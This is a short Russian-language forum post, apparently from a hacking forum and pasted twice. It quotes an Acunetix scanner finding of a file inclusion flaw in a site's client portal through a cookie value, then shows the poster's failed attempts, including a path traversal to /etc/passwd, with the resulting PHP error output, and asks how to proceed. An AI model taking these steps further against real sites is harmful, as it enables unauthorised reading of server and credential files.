.Light.
23.02.2016, 09:45
как быть с этим?
File inclusion
Vulnerability description
This script is possibly vulnerable to file inclusion attacks.
It seems that this script includes a file which name is determined using user-supplied data. This data is not properly validated before being passed to the include function.
This vulnerability affects /client-portal/ (https://antichat.live/file_/C_/ProgramData/Acunetix_20WVS_2010/Data/Reporter/ReportItemTemp.xml/).
Discovered by: Scripting (File_Inclusion.script).
Attack details
Cookie input FxOACPLang was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg (http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg)
Pattern found:
Failed opening required '/home/admin/web/public_html/location/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg.php'
Ошибка
Warning: require_once(/home/admin/web/site/public_html/client-portal/location/http:/image.php.php): failed to open stream: No such file or directory in /home/admin/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d codeon line 21
Fatal error: require_once(): Failed opening required '/home/admin/web/site/public_html/client-portal/location/http://image.php.php (http://image.php.php/)' (include_path='.:/usr/share/php:/usr/share/pear') in /home/admin/web/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 21
Пробую вот так ничего не вывыходит(
Fatal error: require_once(): Failed opening required '/home/admin/web/site/public_html/client-portal/location/../../../../../../../etc/passwd' (include_path='.:/usr/share/php:/usr/share/pear') in /home/admin/web/site/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 21
File inclusion
Vulnerability description
This script is possibly vulnerable to file inclusion attacks.
It seems that this script includes a file which name is determined using user-supplied data. This data is not properly validated before being passed to the include function.
This vulnerability affects /client-portal/ (https://antichat.live/file_/C_/ProgramData/Acunetix_20WVS_2010/Data/Reporter/ReportItemTemp.xml/).
Discovered by: Scripting (File_Inclusion.script).
Attack details
Cookie input FxOACPLang was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg (http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg)
Pattern found:
Failed opening required '/home/admin/web/public_html/location/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg.php'
Ошибка
Warning: require_once(/home/admin/web/site/public_html/client-portal/location/http:/image.php.php): failed to open stream: No such file or directory in /home/admin/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d codeon line 21
Fatal error: require_once(): Failed opening required '/home/admin/web/site/public_html/client-portal/location/http://image.php.php (http://image.php.php/)' (include_path='.:/usr/share/php:/usr/share/pear') in /home/admin/web/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 21
Пробую вот так ничего не вывыходит(
Fatal error: require_once(): Failed opening required '/home/admin/web/site/public_html/client-portal/location/../../../../../../../etc/passwd' (include_path='.:/usr/share/php:/usr/share/pear') in /home/admin/web/site/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 21